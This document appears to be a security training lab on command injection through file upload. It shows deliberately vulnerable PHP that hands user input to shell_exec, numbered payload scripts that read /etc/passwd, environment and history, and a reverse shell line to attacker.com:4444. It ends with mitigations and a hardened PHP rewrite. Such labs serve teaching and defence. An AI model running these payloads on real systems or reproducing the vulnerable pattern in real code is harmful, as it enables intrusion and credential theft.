Lab 3: Command Injection via File Upload

Command injection attacks through file upload functionality

Difficulty: Medium

Lab Overview

This lab demonstrates command injection vulnerabilities that can be exploited through file upload functionality. Attackers can upload files containing malicious commands, or submit commands that reference uploaded files, which the server then processes and executes.

Objective: Use file upload functionality to achieve command injection and code execution.

Vulnerable Code
// Vulnerable: Direct execution without validation
function execute_uploaded_command($command) {
    if (empty($command)) {
        return "No command specified.";
    }
    
    // Vulnerable: Direct execution using shell_exec
    $output = @shell_exec($command . ' 2>&1');
    
    if ($output === null) {
        return "Command execution failed or no output.";
    }
    
    return $output;
}

Vulnerability Details
  • Type: Command Injection via File Upload
  • Severity: High
  • Method: POST
  • Issue: Direct execution of uploaded files and commands
File Upload Command Injection Examples
  • malicious.sh - Upload shell script
  • whoami - Basic command
  • cat uploads/file.txt - Read uploaded file
  • bash uploads/script.sh - Execute uploaded script
File Upload Command Injection Payloads

Upload these files to test command injection vulnerabilities:

1. Basic Shell Script (script.sh):
#!/bin/bash
echo "Hacked!"
whoami
id
pwd
ls -la

2. Information Gathering Script (info.sh):
#!/bin/bash
echo "System Information:"
echo "User: $(whoami)"
echo "ID: $(id)"
echo "PWD: $(pwd)"
echo "Hostname: $(hostname)"
echo "Uname: $(uname -a)"
echo "Date: $(date)"

3. File System Access Script (filesystem.sh):
#!/bin/bash
echo "File System Access:"
echo "Passwd:"
cat /etc/passwd
echo "Hosts:"
cat /etc/hosts
echo "Directory Listing:"
ls -la /

4. Process Information Script (process.sh):
#!/bin/bash
echo "Process Information:"
ps aux
echo "Network:"
netstat -an
echo "Disk Usage:"
df -h
echo "Memory:"
free -m

5. Network Information Script (network.sh):
#!/bin/bash
echo "Network Information:"
ifconfig
echo "Routes:"
route -n
echo "ARP:"
arp -a
echo "DNS:"
nslookup google.com

6. User Information Script (user.sh):
#!/bin/bash
echo "User Information:"
groups
echo "Crontab:"
crontab -l
echo "History:"
history
echo "Environment:"
env

7. Reverse Shell Script (reverse.sh):
#!/bin/bash
bash -i >& /dev/tcp/attacker.com/4444 0>&1

8. Command Execution Script (exec.sh):
#!/bin/bash
echo "Command Execution:"
whoami
id
pwd
ls -la
ps aux
netstat -an

9. File Operations Script (fileops.sh):
#!/bin/bash
echo "File Operations:"
touch /tmp/test.txt
echo "test" > /tmp/test.txt
cat /tmp/test.txt
rm /tmp/test.txt
mkdir /tmp/testdir
rmdir /tmp/testdir

10. Advanced Commands Script (advanced.sh):
#!/bin/bash
echo "Advanced Commands:"
find / -name "*.php" 2>/dev/null
grep -r "password" /var/www/ 2>/dev/null
find / -perm -4000 2>/dev/null
find / -writable 2>/dev/null

11. Command Execution via Uploaded Files:
cat uploads/script.sh
bash uploads/script.sh
chmod +x uploads/script.sh && ./uploads/script.sh
source uploads/script.sh

12. File Reading via Uploaded Files:
cat uploads/info.txt
head -10 uploads/data.txt
tail -10 uploads/log.txt
grep "error" uploads/log.txt

13. Process Execution via Uploaded Files:
./uploads/script.sh
bash uploads/script.sh
sh uploads/script.sh
python uploads/script.py

14. File Manipulation via Uploaded Files:
cp uploads/template.txt /tmp/
mv uploads/data.txt /tmp/
ln -s uploads/symlink.txt /tmp/
chmod 755 uploads/script.sh

Real-World Attack Scenarios
Mitigation Strategies
  • Implement proper file upload validation and sanitization
  • Use whitelist-based file type validation
  • Avoid direct command execution functions such as shell_exec on user-controlled input
  • Use parameterized commands and safe APIs
  • Implement proper access controls and permissions
  • Perform regular security testing and vulnerability assessments
  • Monitor for unusual file upload patterns and content
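
A hardened counterpart to execute_uploaded_command(), added here as an example and not part of the lab's own code: it applies the allowlist and "safe APIs" points above by replacing the free-form command string with a fixed set of read-only actions implemented in PHP, so nothing reaches a shell. UPLOAD_DIR, resolve_upload(), run_upload_action() and the extension allowlist are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumption: uploads are stored here, outside the web root, without execute bits.
const UPLOAD_DIR = '/var/app/uploads';

// Hypothetical helper: map a user-supplied name to a regular file inside
// UPLOAD_DIR, or return null if it does not qualify.
function resolve_upload(string $name): ?string {
    // Allowlist on name shape and extension: no '/', '..', spaces or ';'.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.(txt|log|csv)\z/', $name)) {
        return null;
    }
    $base = realpath(UPLOAD_DIR);
    $path = realpath(UPLOAD_DIR . '/' . $name);   // resolves symlinks
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // A symlink planted in the upload directory must not lead outside it.
    return strncmp($path, $base . '/', strlen($base) + 1) === 0 ? $path : null;
}

// Hypothetical replacement for execute_uploaded_command(): the caller picks
// an action from a fixed set instead of supplying a command line.
function run_upload_action(string $action, string $name, string $needle = ''): string {
    $path = resolve_upload($name);
    $lines = $path === null ? false : file($path, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        return 'Invalid or unreadable file.';
    }
    switch ($action) {
        case 'head': $out = array_slice($lines, 0, 10); break;
        case 'tail': $out = array_slice($lines, -10); break;
        case 'grep': // literal substring match, not a regex or a shell glob
            $out = $needle === '' ? [] : array_filter(
                $lines, fn(string $l): bool => strpos($l, $needle) !== false);
            break;
        default:
            return 'Unknown action.';
    }
    // Assumption: the result is rendered in an HTML page, so encode it.
    return htmlspecialchars(implode("\n", $out), ENT_QUOTES, 'UTF-8');
}

// Constructed inputs: each is refused by the name allowlist before any file access.
foreach (['log.txt; id', '../../etc/passwd', 'script.sh'] as $bad) {
    echo $bad, ' => ', run_upload_action('head', $bad), "\n";
}
```

file() reads the whole upload into memory, so this design also relies on a size limit being enforced at upload time.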